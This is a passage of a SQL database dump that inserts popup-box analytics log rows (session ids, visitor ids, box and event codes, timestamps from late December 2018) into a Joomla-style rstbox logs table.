(42584, 'ce3c0cd54d73e1f324bb22ac9feaa6f7', 'c0378a731c837887', 0, 2, 1, '2018-12-25 21:57:59'),
(42585, '22721b9982aa30c4b65d356bf1b18c41', 'ef8b7c32c957811a', 0, 2, 1, '2018-12-25 22:33:01'),
(42586, 'dfadc3129fd48cc79154cca9af2e9d33', '8210f19703ca9352', 0, 2, 1, '2018-12-25 22:35:15'),
(42587, 'dfadc3129fd48cc79154cca9af2e9d33', '8210f19703ca9352', 0, 2, 1, '2018-12-25 22:41:44'),
(42588, '22721b9982aa30c4b65d356bf1b18c41', 'ef8b7c32c957811a', 0, 2, 1, '2018-12-25 22:42:35'),
(42589, '22721b9982aa30c4b65d356bf1b18c41', 'ef8b7c32c957811a', 0, 2, 1, '2018-12-25 22:42:59'),
(42590, '22721b9982aa30c4b65d356bf1b18c41', 'ef8b7c32c957811a', 0, 2, 1, '2018-12-25 23:19:11'),
(42591, 'ef050d8d07b95525fba8d1fa747de879', '84c106e295614407', 0, 2, 1, '2018-12-25 23:40:12'),
(42592, '184a465fd697b6c28e5af6b3b28a6d80', '29ef45db200a8f59', 0, 2, 1, '2018-12-25 23:42:02'),
(42593, '184a465fd697b6c28e5af6b3b28a6d80', '29ef45db200a8f59', 0, 2, 1, '2018-12-25 23:44:03'),
(42594, '49b79194bbed89d5feb7800e6dcfbb7e', 'bd4403f7bb9e8ef1', 0, 2, 1, '2018-12-25 23:55:31'),
(42595, '49b79194bbed89d5feb7800e6dcfbb7e', 'bd4403f7bb9e8ef1', 0, 2, 1, '2018-12-25 23:56:13'),
(42596, '49b79194bbed89d5feb7800e6dcfbb7e', 'bd4403f7bb9e8ef1', 0, 2, 1, '2018-12-25 23:56:35'),
(42597, '4d2fd7feeaed93441d14e0af20f98ea3', 'bcd333564bcc404d', 0, 2, 1, '2018-12-25 23:56:54'),
(42598, '4d2fd7feeaed93441d14e0af20f98ea3', 'bcd333564bcc404d', 0, 2, 1, '2018-12-26 00:07:16'),
(42599, '4d2fd7feeaed93441d14e0af20f98ea3', 'bcd333564bcc404d', 0, 2, 1, '2018-12-26 00:07:50'),
(42600, '2d1d08749878970701a9adc4cd8f9a27', '09a6fd36b4f0073b', 0, 2, 1, '2018-12-26 00:26:17'),
(42601, 'ab0fe6bce6fc37bef36d02a9c7b4a8fe', '7cd748af470b76f4', 0, 2, 1, '2018-12-26 00:47:14'),
(42602, 'b9749315673b4089f400e5d8021aeb8f', '7072884f4a800e0c', 0, 2, 1, '2018-12-26 01:45:09'),
(42603, 'b8b4c133491e8d97a41fd515969ac20c', '68f6b63058d42718', 0, 2, 1, '2018-12-26 01:48:49'),
(42604, 'b8b4c133491e8d97a41fd515969ac20c', '68f6b63058d42718', 0, 2, 1, '2018-12-26 01:49:19'),
(42605, 'b8b4c133491e8d97a41fd515969ac20c', '68f6b63058d42718', 0, 2, 1, '2018-12-26 01:50:02'),
(42606, '3f9db71245b7b83f9ec11e6401cadd5c', '3363df07260b158f', 0, 2, 1, '2018-12-26 02:11:17'),
(42607, '47ea3523ee158ebfde276fae80a5d253', '1090e13ed0eea103', 0, 2, 1, '2018-12-26 02:11:57'),
(42608, 'aecaa66e9cd42344b114474d945f67a8', '8ef3356c108bdcd7', 0, 2, 1, '2018-12-26 02:25:17'),
(42609, 'aecaa66e9cd42344b114474d945f67a8', '8ef3356c108bdcd7', 0, 2, 1, '2018-12-26 02:28:03'),
(42610, 'aecaa66e9cd42344b114474d945f67a8', '8ef3356c108bdcd7', 0, 2, 1, '2018-12-26 02:28:26'),
(42611, '1aa12b380bef6bf5d80f40a7f4770e2f', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-26 02:43:06'),
(42612, '1aa12b380bef6bf5d80f40a7f4770e2f', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-26 02:45:18'),
(42613, '8c1ef2f3207ccde67a169a969a70ecc4', '2535afcbc3f5fd35', 0, 2, 1, '2018-12-26 03:01:52'),
(42614, 'c8d8c9400fb3d8354496e292c77c8c4b', '55dd11ca982115e8', 0, 2, 1, '2018-12-26 03:10:45'),
(42615, 'c8d8c9400fb3d8354496e292c77c8c4b', '55dd11ca982115e8', 0, 2, 1, '2018-12-26 03:12:44'),
(42616, 'c8d8c9400fb3d8354496e292c77c8c4b', '55dd11ca982115e8', 0, 2, 1, '2018-12-26 03:14:41'),
(42617, 'c8d8c9400fb3d8354496e292c77c8c4b', '55dd11ca982115e8', 0, 2, 1, '2018-12-26 03:16:01'),
(42618, 'c8d8c9400fb3d8354496e292c77c8c4b', '55dd11ca982115e8', 0, 2, 1, '2018-12-26 03:17:17'),
(42619, 'c8d8c9400fb3d8354496e292c77c8c4b', '55dd11ca982115e8', 0, 2, 1, '2018-12-26 03:17:40'),
(42620, 'c8d8c9400fb3d8354496e292c77c8c4b', '55dd11ca982115e8', 0, 2, 1, '2018-12-26 03:19:02'),
(42621, 'c8d8c9400fb3d8354496e292c77c8c4b', '55dd11ca982115e8', 0, 2, 1, '2018-12-26 03:20:18'),
(42622, 'c8d8c9400fb3d8354496e292c77c8c4b', '55dd11ca982115e8', 0, 2, 1, '2018-12-26 03:20:46'),
(42623, '8746cc55276d914731ce30e4dedac1a0', 'e851a83c780c3b9c', 0, 2, 1, '2018-12-26 03:51:00'),
(42624, '954dddf2f2dd75d7f35bba2ab86c930f', '69627c72069e0054', 0, 2, 1, '2018-12-26 04:06:18'),
(42625, '55d729eb56b69d9eb77295d7c3e6c51c', '152dd36b7ae63404', 0, 2, 1, '2018-12-26 04:14:49'),
(42626, '8a91e4f279749225c97bc6b736b6ed3d', '58cebb7f30f25c53', 0, 2, 1, '2018-12-26 04:18:42'),
(42627, '9fd2f32b5c056d35135eff85dfe817cd', '51df446c19685386', 0, 2, 1, '2018-12-26 04:25:34'),
(42628, '096571f802656b88d19af2bb1940d8e4', '238e75313b369def', 0, 2, 1, '2018-12-26 04:53:11'),
(42629, '74488d8b76a36f34b7800d34ef33b56b', 'b5dea531bb51b38d', 0, 2, 1, '2018-12-26 05:13:16'),
(42630, '74488d8b76a36f34b7800d34ef33b56b', 'b5dea531bb51b38d', 0, 2, 1, '2018-12-26 05:14:29'),
(42631, 'b181e8f72ab2e71bea9ce061cc6eff6b', '26e67cd3a1d737ea', 0, 2, 1, '2018-12-26 05:27:08'),
(42632, '74488d8b76a36f34b7800d34ef33b56b', 'b5dea531bb51b38d', 0, 2, 1, '2018-12-26 05:35:52'),
(42633, '74488d8b76a36f34b7800d34ef33b56b', 'b5dea531bb51b38d', 0, 2, 1, '2018-12-26 05:44:18'),
(42634, '23d8b548f80995f1b4c552173772e663', '3ad5b0a763c9dcbe', 0, 2, 1, '2018-12-26 05:48:09'),
(42635, '023ca7cdf4c57d9d7cbda71b44570c0b', '5df1dcc4e93594b4', 0, 2, 1, '2018-12-26 05:50:25'),
(42636, '022b42a856673a0575e8811c36b8d65e', 'a722fceca93a62f9', 0, 2, 1, '2018-12-26 05:51:30'),
(42637, 'f88fdb9367390e8b16838ec396846565', 'fbf0576065758144', 0, 2, 1, '2018-12-26 05:56:03'),
(42638, '37a8e1ab51687b8c0181b2598f19f08a', '4e4d7621eb4e538b', 0, 2, 1, '2018-12-26 05:59:25'),
(42639, '1aa12b380bef6bf5d80f40a7f4770e2f', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-26 06:07:20'),
(42640, '2234df2bb5a8e01d880e097befef32fc', 'eca4f415fff48abc', 0, 2, 1, '2018-12-26 06:08:02'),
(42641, '4efacc9c51bc218977cb9ca720275ca8', '595a828323832526', 0, 2, 1, '2018-12-26 06:51:06'),
(42642, '4efacc9c51bc218977cb9ca720275ca8', '595a828323832526', 0, 2, 1, '2018-12-26 06:51:33'),
(42643, '4efacc9c51bc218977cb9ca720275ca8', '595a828323832526', 0, 2, 1, '2018-12-26 06:51:40'),
(42644, '4efacc9c51bc218977cb9ca720275ca8', '595a828323832526', 0, 2, 1, '2018-12-26 06:52:01'),
(42645, '4efacc9c51bc218977cb9ca720275ca8', '595a828323832526', 0, 2, 1, '2018-12-26 06:58:25'),
(42646, '4efacc9c51bc218977cb9ca720275ca8', '595a828323832526', 0, 2, 1, '2018-12-26 06:58:49'),
(42647, '6708bdf098dd6515e0a8e4335b098d0a', 'c23c803c69b50d18', 0, 2, 1, '2018-12-26 07:08:27'),
(42648, 'ffcc38048cb39f6882a893770de10971', '9ffcca18999658c8', 0, 2, 1, '2018-12-26 07:11:42'),
(42649, '81c3b99dcc17bc49b26392d45fdc1338', '55244e55698893c7', 0, 2, 1, '2018-12-26 07:33:13'),
(42650, 'f129d9fd6de3ece9483e80fa9c936211', '0deb56f5fb747451', 0, 2, 1, '2018-12-26 07:41:00'),
(42651, '969afb21db10cdd6e7f77288e9cf33bd', 'e71a410e5359f3ef', 0, 2, 1, '2018-12-26 07:49:59'),
(42652, '22721b9982aa30c4b65d356bf1b18c41', 'ef8b7c32c957811a', 0, 2, 1, '2018-12-26 08:58:47'),
(42653, '93f45d6f20a8680f646516dee97dfb92', '87d3845a7f172f46', 0, 2, 1, '2018-12-26 09:12:42'),
(42654, '301a0c5190916a42cf5b12b73f6e8943', '7c2fa8ac97126d44', 0, 2, 1, '2018-12-26 09:45:11'),
(42655, '301a0c5190916a42cf5b12b73f6e8943', '7c2fa8ac97126d44', 0, 2, 1, '2018-12-26 09:45:43'),
(42656, '301a0c5190916a42cf5b12b73f6e8943', '7c2fa8ac97126d44', 0, 2, 1, '2018-12-26 09:46:08'),
(42657, '301a0c5190916a42cf5b12b73f6e8943', '7c2fa8ac97126d44', 0, 2, 1, '2018-12-26 09:46:35'),
(42658, '97ba716e40961646bc5f7ecaa377962e', '4a7d278bd6c2e4c6', 0, 2, 1, '2018-12-26 10:28:36'),
(42659, '97ba716e40961646bc5f7ecaa377962e', '4a7d278bd6c2e4c6', 0, 2, 1, '2018-12-26 10:31:03'),
(42660, 'eadabd6a19eae115d820e3edfcea992b', '553b9f0a18b97af8', 0, 2, 1, '2018-12-26 10:32:33'),
(42661, 'eadabd6a19eae115d820e3edfcea992b', '553b9f0a18b97af8', 0, 2, 1, '2018-12-26 10:32:48'),
(42662, 'eadabd6a19eae115d820e3edfcea992b', '553b9f0a18b97af8', 0, 2, 1, '2018-12-26 10:34:06'),
(42663, 'eadabd6a19eae115d820e3edfcea992b', '553b9f0a18b97af8', 0, 2, 1, '2018-12-26 10:34:28'),
(42664, 'a5344d802d55ebedc90a58414c810e4b', 'b1c053a055556c1b', 0, 2, 1, '2018-12-26 10:39:53'),
(42665, '2704de59f6da5250bd42e90c8ece9d76', 'a390244a5d85f29e', 0, 2, 1, '2018-12-26 10:39:55'),
(42666, '483aa917825505c7c04200d78c4c45b8', 'c4c7df3d29542540', 0, 2, 1, '2018-12-26 10:41:24'),
(42667, '2f97dd21aee5f98e34fa45e7a8394cd2', 'd6b9cd5bfdd27ced', 0, 2, 1, '2018-12-26 11:02:38'),
(42668, '2f97dd21aee5f98e34fa45e7a8394cd2', 'd6b9cd5bfdd27ced', 0, 2, 1, '2018-12-26 11:02:45'),
(42669, '8a989a83546ed0cb832485493d894ecc', 'bded5f77d93f8b0a', 0, 2, 1, '2018-12-26 11:19:08'),
(42670, 'f5af3d654a1b8c3ae933e054ae60cbbe', 'bab38eedb88cd096', 0, 2, 1, '2018-12-26 12:07:38'),
(42671, '1511f832d82dc94fa61a0a28130d8dc6', '474a1ba4ebed7f56', 0, 2, 1, '2018-12-26 12:12:21'),
(42672, '88266dbf866d407850fcd0069029d5f6', '75379d0d3e46faf8', 0, 2, 1, '2018-12-26 12:20:12'),
(42673, 'fe10c2a048b12dd08ceb4449c9cd11ec', '8f13f1d2791e0244', 0, 2, 1, '2018-12-26 12:40:38'),
(42674, 'd8caa98d5aeb94e11d95e8da15a3c044', 'ccf06e87f907145c', 0, 2, 1, '2018-12-26 12:40:53'),
(42675, 'fe10c2a048b12dd08ceb4449c9cd11ec', '8f13f1d2791e0244', 0, 2, 1, '2018-12-26 12:41:54'),
(42676, 'b21ce49d82ff351b4af685fd2c10018c', '575b738595cdb2f5', 0, 2, 1, '2018-12-26 12:53:03'),
(42677, '184a465fd697b6c28e5af6b3b28a6d80', '29ef45db200a8f59', 0, 2, 1, '2018-12-26 12:55:19'),
(42678, '87c4595752a3869bf1c3fa9f0bb2b333', '6711272a62e81edf', 0, 2, 1, '2018-12-26 13:17:21'),
(42679, '59ccde882ef4d8be88b863d92e72d4e5', '072c2b3b34044005', 0, 2, 1, '2018-12-26 13:20:10'),
(42680, '82af3cab602a4f6be298270770e2412b', 'ab7276a1934c4897', 0, 2, 1, '2018-12-26 13:28:15'),
(42681, '126a545636142aaf6848e9df0cea97cc', '80f55ebb7e18f551', 0, 2, 1, '2018-12-26 13:30:35'),
(42682, 'f749f49a443f91e7fd07152183159b9b', '3ea7c41f2f68e781', 0, 2, 1, '2018-12-26 13:40:30'),
(42683, 'f749f49a443f91e7fd07152183159b9b', '3ea7c41f2f68e781', 0, 2, 1, '2018-12-26 13:41:23'),
(42684, '55d729eb56b69d9eb77295d7c3e6c51c', '152dd36b7ae63404', 0, 2, 1, '2018-12-26 13:52:24'),
(42685, '57994927250b451f2b9bca9439502f1e', 'b24c875fc93dab0d', 0, 2, 1, '2018-12-26 14:15:07'),
(42686, '999ac246b366ec6264b2c26a62e1e063', '5222bf7465da0efd', 0, 2, 1, '2018-12-26 14:39:31'),
(42687, 'aaafb044e035960b3c7d272c7d0ec0fe', '8f13f1d2791e0244', 0, 2, 1, '2018-12-26 14:45:57'),
(42688, 'cc6b6655aac37eb0be7b10985383ff32', '7cc7b5dd731a4b48', 0, 2, 1, '2018-12-26 14:51:06'),
(42689, 'cc6b6655aac37eb0be7b10985383ff32', '7cc7b5dd731a4b48', 0, 2, 1, '2018-12-26 14:51:15'),
(42690, '3c915334bff21599d56f6816c15cfe3a', '503a514a8daa32a7', 0, 2, 1, '2018-12-26 14:55:26'),
(42691, 'd6978b7ef5a6d6cd4036ed57673aef72', '7b24ae585a84a927', 0, 2, 1, '2018-12-26 15:01:00'),
(42692, '4b3fe9b5110b0847bfac5bea8a3dd7b8', 'f89c551c17589021', 0, 2, 1, '2018-12-26 15:01:35'),
(42693, '4b3fe9b5110b0847bfac5bea8a3dd7b8', 'f89c551c17589021', 0, 2, 1, '2018-12-26 15:01:48'),
(42694, '3c915334bff21599d56f6816c15cfe3a', '503a514a8daa32a7', 0, 2, 1, '2018-12-26 15:04:47'),
(42695, '80f0625d25b21154d39560568ea56406', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-26 15:07:15'),
(42696, 'bbb5886eb82f0b5de4ebd58963e69913', '7b445ab85e20f3ad', 0, 2, 1, '2018-12-26 15:09:06'),
(42697, '25628a67e79dced35886a448d4a9a70f', '8ad007cf09224cd8', 0, 2, 1, '2018-12-26 15:10:18'),
(42698, '4d17dd1e06a0891aa6b77cc6505aa27d', '1ec75219d7482e28', 0, 2, 1, '2018-12-26 15:11:53'),
(42699, '80f0625d25b21154d39560568ea56406', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-26 15:12:59'),
(42700, '33ae82c9a9ef9acf151471642c96fe88', '1f2a82cd68d8bbd5', 0, 2, 1, '2018-12-26 15:13:02'),
(42701, '3c915334bff21599d56f6816c15cfe3a', '503a514a8daa32a7', 0, 2, 1, '2018-12-26 15:13:21'),
(42702, '3c915334bff21599d56f6816c15cfe3a', '503a514a8daa32a7', 0, 2, 1, '2018-12-26 15:16:56'),
(42703, '4d17dd1e06a0891aa6b77cc6505aa27d', '1ec75219d7482e28', 0, 2, 1, '2018-12-26 15:21:53'),
(42704, '4d17dd1e06a0891aa6b77cc6505aa27d', '1ec75219d7482e28', 0, 2, 1, '2018-12-26 15:22:30'),
(42705, '71950eaa60af28be133cb00037464386', 'd29852129d325244', 0, 2, 1, '2018-12-26 15:23:02'),
(42706, '33ae82c9a9ef9acf151471642c96fe88', '1f2a82cd68d8bbd5', 0, 2, 1, '2018-12-26 15:25:30'),
(42707, 'bbb5886eb82f0b5de4ebd58963e69913', '7b445ab85e20f3ad', 0, 2, 1, '2018-12-26 15:26:54'),
(42708, '174d5b675831169cb9e85f7f7b0a3128', '307d4c2987bfadb3', 0, 2, 1, '2018-12-26 15:30:17'),
(42709, '174d5b675831169cb9e85f7f7b0a3128', '307d4c2987bfadb3', 0, 2, 1, '2018-12-26 15:30:49'),
(42710, '174d5b675831169cb9e85f7f7b0a3128', '307d4c2987bfadb3', 0, 2, 1, '2018-12-26 15:31:29'),
(42711, '3c915334bff21599d56f6816c15cfe3a', '503a514a8daa32a7', 0, 2, 1, '2018-12-26 15:35:10'),
(42712, '5f490c27ed30aa4e593da0c236f01a42', 'dace6e0c219330fc', 0, 2, 1, '2018-12-26 15:36:16'),
(42713, '33ae82c9a9ef9acf151471642c96fe88', '1f2a82cd68d8bbd5', 0, 2, 1, '2018-12-26 15:36:44'),
(42714, '3c915334bff21599d56f6816c15cfe3a', '503a514a8daa32a7', 0, 2, 1, '2018-12-26 15:38:11'),
(42715, 'a78570a566a8b955762f6ebdab67180c', '46713cac27a94b83', 0, 2, 1, '2018-12-26 15:38:21'),
(42716, 'a78570a566a8b955762f6ebdab67180c', '46713cac27a94b83', 0, 2, 1, '2018-12-26 15:38:30'),
(42717, 'f24d618d8f5e7cc82bf356fce00becb0', 'd0fd814b5f780917', 0, 2, 1, '2018-12-26 15:39:33'),
(42718, '3c915334bff21599d56f6816c15cfe3a', '503a514a8daa32a7', 0, 2, 1, '2018-12-26 15:43:21'),
(42719, '80f0625d25b21154d39560568ea56406', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-26 15:44:01'),
(42720, '3c915334bff21599d56f6816c15cfe3a', '503a514a8daa32a7', 0, 2, 1, '2018-12-26 15:44:32'),
(42721, '80f0625d25b21154d39560568ea56406', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-26 15:44:53'),
(42722, '82c42e10f07f868f9b2cbca66fdf2fac', '34ec142c805c34fe', 0, 2, 1, '2018-12-26 15:47:08'),
(42723, '4d17dd1e06a0891aa6b77cc6505aa27d', '1ec75219d7482e28', 0, 2, 1, '2018-12-26 15:50:50'),
(42724, 'dd589c7260405df42e69122205e595c0', '77d629067fed3a03', 0, 2, 1, '2018-12-26 15:53:18'),
(42725, 'dd589c7260405df42e69122205e595c0', '77d629067fed3a03', 0, 2, 1, '2018-12-26 15:53:35'),
(42726, 'dd589c7260405df42e69122205e595c0', '77d629067fed3a03', 0, 2, 1, '2018-12-26 15:53:42'),
(42727, '40e426cf7a503b892cbf219c573dece7', '24a3a7dee025bca3', 0, 2, 1, '2018-12-26 15:55:04'),
(42728, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2018-12-26 15:56:24'),
(42729, 'afc8eb0cc95e224ec1cc8d5288c4dbfc', '829e93e9a3589b2a', 0, 2, 1, '2018-12-26 15:57:11'),
(42730, '504021308bc0550ac052a001c965fdae', 'e79091a79ce3d2bd', 0, 2, 1, '2018-12-26 15:58:38'),
(42731, 'bbb5886eb82f0b5de4ebd58963e69913', '7b445ab85e20f3ad', 0, 2, 1, '2018-12-26 16:00:48'),
(42732, '56302ce833a88f3dd2c2ee778ffe37d9', 'b5aa5bf58fedb8e0', 0, 2, 1, '2018-12-26 16:01:24'),
(42733, '56302ce833a88f3dd2c2ee778ffe37d9', 'b5aa5bf58fedb8e0', 0, 2, 1, '2018-12-26 16:01:35'),
(42734, '31274d4a0f33d42f23b5cb9db1769b71', 'b2bafb74467116e9', 0, 2, 1, '2018-12-26 16:01:59'),
(42735, '02bae101cc3cca257bd038aca58bbf9e', 'de9b8e6bc6e762ed', 0, 2, 1, '2018-12-26 16:03:46'),
(42736, '55eb56ed4ce872c08452a0fc472e9134', '29608a328df169fa', 0, 2, 1, '2018-12-26 16:06:47'),
(42737, '17f459010933b6977a147d38fbe62183', '82790c28d3444dd6', 0, 2, 1, '2018-12-26 16:06:57'),
(42738, '55eb56ed4ce872c08452a0fc472e9134', '29608a328df169fa', 0, 2, 1, '2018-12-26 16:07:05'),
(42739, '748cd470c14f4b444cbd5692156c3688', 'd11c71184ec28f6f', 0, 2, 1, '2018-12-26 16:07:06'),
(42740, '5f9e6605f9a14d01a26dfb3eb6c9219e', 'd83be9192f556fc0', 0, 2, 1, '2018-12-26 16:08:49'),
(42741, 'd3421d589da86dd0ee7e2ab714d26a3a', 'df27b9a2919a8206', 0, 2, 1, '2018-12-26 16:09:39'),
(42742, '4c81c820b718b075812ad2a4b6a46229', '51597bf7a3572f16', 0, 2, 1, '2018-12-26 16:09:57'),
(42743, '027b4ba6df52a63b4838b9996365f4ed', 'a6fd7867f90cb5e8', 0, 2, 1, '2018-12-26 16:11:57'),
(42744, '2e02c40cf9c666af5e88beefe081b4c5', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-26 16:15:26'),
(42745, 'ee1d88c6524e3d866d9906f4d91f255a', 'f581e4b759581b56', 0, 2, 1, '2018-12-26 16:17:58'),
(42746, '1745c47c6f8a5a29f0506e13bb833ece', '55bd1d9528102569', 0, 2, 1, '2018-12-26 16:18:10'),
(42747, 'b3cba19432d0b462cf165781fe1011cd', '3588180e6471bbc2', 0, 2, 1, '2018-12-26 16:18:37'),
(42748, '3fc37e107d75fc1f76363307ae365527', '7501b42c35accff7', 0, 2, 1, '2018-12-26 16:22:52'),
(42749, '1009082e1afa83efd98c21f8ed0cb95c', '074ec8007ba74449', 0, 2, 1, '2018-12-26 16:24:53'),
(42750, 'cd6fb3fa2f51400a0586581a4b3f771a', '1f701c4a0ea29200', 0, 2, 1, '2018-12-26 16:25:21'),
(42751, 'b3cba19432d0b462cf165781fe1011cd', '3588180e6471bbc2', 0, 2, 1, '2018-12-26 16:26:05'),
(42752, '8a339b4e713717b0d33a321b5aa71df7', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-26 16:26:44');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(42753, 'b48dc616cc22ed31f7978685c867415b', '6e117bd555667400', 0, 2, 1, '2018-12-26 16:27:10'),
(42754, '6d6cc6ebc9a185352f6b8dc1ee20714a', '049dbeed11095c77', 0, 2, 1, '2018-12-26 16:27:30'),
(42755, '46bfd5701a4f7b0543010a6185a4c487', '5c6572dc21972a01', 0, 2, 1, '2018-12-26 16:27:56'),
(42756, '6d6cc6ebc9a185352f6b8dc1ee20714a', '049dbeed11095c77', 0, 2, 1, '2018-12-26 16:28:05'),
(42757, '36b3b85b1847a94432e1281c8bcbadda', '3980136eb82f67c3', 0, 2, 1, '2018-12-26 16:31:19'),
(42758, '91f6f831183b6f20496787be599f7c80', '2034f09284a4c7ca', 0, 2, 1, '2018-12-26 16:31:37'),
(42759, 'f27514e6e6c4c1a2a1b613905e7e71ca', '19dba98cb9cf777c', 0, 2, 1, '2018-12-26 16:33:55'),
(42760, 'b35380df925c3ec9ff1dbde6da1c0d76', 'a95e86198bac6650', 0, 2, 1, '2018-12-26 16:34:42'),
(42761, '00e00b5afa730515ec1d3893119765b1', '84c73015e9e28e8a', 0, 2, 1, '2018-12-26 16:36:04'),
(42762, 'b695a689bc00794f2a4773009ceffd25', '92e57cde0d5e4f86', 0, 2, 1, '2018-12-26 16:36:48'),
(42763, '00e00b5afa730515ec1d3893119765b1', '84c73015e9e28e8a', 0, 2, 1, '2018-12-26 16:36:50'),
(42764, 'ecd6da52ac30df80a3d8329aea4c7834', 'b0a78e7cf3aced38', 0, 2, 1, '2018-12-26 16:38:31'),
(42765, 'ecd6da52ac30df80a3d8329aea4c7834', 'b0a78e7cf3aced38', 0, 2, 1, '2018-12-26 16:39:06'),
(42766, 'ecd6da52ac30df80a3d8329aea4c7834', 'b0a78e7cf3aced38', 0, 2, 1, '2018-12-26 16:40:03'),
(42767, 'd14ea7556e53dece83873a4d4056f949', 'b2e78912dacced42', 0, 2, 1, '2018-12-26 16:40:50'),
(42768, '73a7155fb8c7822ca8c517718e7139e2', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-26 16:42:00'),
(42769, 'dc8f0fdb00fcd19fafe6f738ae3ab9ba', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-26 16:42:02'),
(42770, '73a7155fb8c7822ca8c517718e7139e2', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-26 16:42:30'),
(42771, '851578100785905bc8e7d0fdea6732e0', '5a08da7046298e7a', 0, 2, 1, '2018-12-26 16:42:43'),
(42772, 'd7784577062c4bccd04823c4b7bdd6d0', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-26 16:43:23'),
(42773, 'c1a4b23c66fad71727967aaefa8ef6f9', '1c68b977b911188c', 0, 2, 1, '2018-12-26 16:43:55'),
(42774, '5c5244c1afa05eac9fb25e1c895e9f69', 'c2a9c7ebb7169f9c', 0, 2, 1, '2018-12-26 16:44:07'),
(42775, '00e00b5afa730515ec1d3893119765b1', '84c73015e9e28e8a', 0, 2, 1, '2018-12-26 16:45:19'),
(42776, 'a60dae3ae70dc69ae664f5c0ee2115dc', 'a86d0aa20820f4cb', 0, 2, 1, '2018-12-26 16:46:52'),
(42777, '0c57d092ca2260938876d1fe1263a0f7', '362f871a2039351c', 0, 2, 1, '2018-12-26 16:49:08'),
(42778, '0c57d092ca2260938876d1fe1263a0f7', '362f871a2039351c', 0, 2, 1, '2018-12-26 16:49:29'),
(42779, 'dc8f0fdb00fcd19fafe6f738ae3ab9ba', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-26 16:52:13'),
(42780, '48bc6bbca914bd637df3634f8971090b', 'e2c8791634be976d', 0, 2, 1, '2018-12-26 16:53:17'),
(42781, '123a84e2fd89b621de36a3eb321837f0', '1d9c54d0b37930ed', 0, 2, 1, '2018-12-26 16:56:11'),
(42782, '123a84e2fd89b621de36a3eb321837f0', '1d9c54d0b37930ed', 0, 2, 1, '2018-12-26 16:56:17'),
(42783, 'c6cc72bf21d9bc7a703b12e15c5e271c', 'fcaa3c8d44082e09', 0, 2, 1, '2018-12-26 16:57:07'),
(42784, '9ed09fdd543706dc3dd9475a262cfc06', '71aaffc000bb3bae', 0, 2, 1, '2018-12-26 16:58:13'),
(42785, '79a020e52f01546e5b9e2fb41f120e5f', 'd364514d2d822cd4', 0, 2, 1, '2018-12-26 17:01:49'),
(42786, 'dc8f0fdb00fcd19fafe6f738ae3ab9ba', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-26 17:02:41'),
(42787, 'fa39f3e2c8fff52e4ae9b3760152899a', 'd0fd814b5f780917', 0, 2, 1, '2018-12-26 17:03:12'),
(42788, '79a020e52f01546e5b9e2fb41f120e5f', 'd364514d2d822cd4', 0, 2, 1, '2018-12-26 17:04:22'),
(42789, 'b9e457e40207bf1e6e232f4ba294460b', '4574603cf07e6399', 0, 2, 1, '2018-12-26 17:06:07'),
(42790, '79a020e52f01546e5b9e2fb41f120e5f', 'd364514d2d822cd4', 0, 2, 1, '2018-12-26 17:06:46'),
(42791, '79a020e52f01546e5b9e2fb41f120e5f', 'd364514d2d822cd4', 0, 2, 1, '2018-12-26 17:11:03'),
(42792, 'b9e457e40207bf1e6e232f4ba294460b', '4574603cf07e6399', 0, 2, 1, '2018-12-26 17:12:42'),
(42793, 'e1a2455cfe9750161df888e0d920dd0f', 'b2b7d546aaf97dd7', 0, 2, 1, '2018-12-26 17:14:10'),
(42794, '0c6800e8d75f647b7f7601414d21e81a', '8a144e5fc2e94311', 0, 2, 1, '2018-12-26 17:14:17'),
(42795, 'e1a2455cfe9750161df888e0d920dd0f', 'b2b7d546aaf97dd7', 0, 2, 1, '2018-12-26 17:14:22'),
(42796, '6eefcb9ea8aeb98e686b3c3e934d7cbe', '7b97e0e18deae8e0', 0, 2, 1, '2018-12-26 17:14:51'),
(42797, '6d6cc6ebc9a185352f6b8dc1ee20714a', '049dbeed11095c77', 0, 2, 1, '2018-12-26 17:14:59'),
(42798, '8b0db6775df8caa19110feedbe0e20df', '32b169e936bbe5df', 0, 2, 1, '2018-12-26 17:15:27'),
(42799, '55eb56ed4ce872c08452a0fc472e9134', '29608a328df169fa', 0, 2, 1, '2018-12-26 17:16:01'),
(42800, 'd851c86587fdf038522acc0e93919849', 'd9500931744bb85f', 0, 2, 1, '2018-12-26 17:16:34'),
(42801, '062a0a92fb7f693f0712a73db9ebcfc4', '91d21119de46096c', 0, 2, 1, '2018-12-26 17:19:30'),
(42802, '062a0a92fb7f693f0712a73db9ebcfc4', '91d21119de46096c', 0, 2, 1, '2018-12-26 17:19:39'),
(42803, 'b9e457e40207bf1e6e232f4ba294460b', '4574603cf07e6399', 0, 2, 1, '2018-12-26 17:23:00'),
(42804, '02a1b251d117e6cc8cb0314a48da345b', 'fccb63434ab0d7c5', 0, 2, 1, '2018-12-26 17:24:25'),
(42805, '02a1b251d117e6cc8cb0314a48da345b', 'fccb63434ab0d7c5', 0, 2, 1, '2018-12-26 17:24:38'),
(42806, '6eefcb9ea8aeb98e686b3c3e934d7cbe', '7b97e0e18deae8e0', 0, 2, 1, '2018-12-26 17:25:32'),
(42807, '8a339b4e713717b0d33a321b5aa71df7', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-26 17:25:57'),
(42808, '00e00b5afa730515ec1d3893119765b1', '84c73015e9e28e8a', 0, 2, 1, '2018-12-26 17:27:38'),
(42809, '00e00b5afa730515ec1d3893119765b1', '84c73015e9e28e8a', 0, 2, 1, '2018-12-26 17:28:03'),
(42810, '2cbad1ae38bf94b1cec169a563fab5a7', '6148fb9d2849eccf', 0, 2, 1, '2018-12-26 17:31:13'),
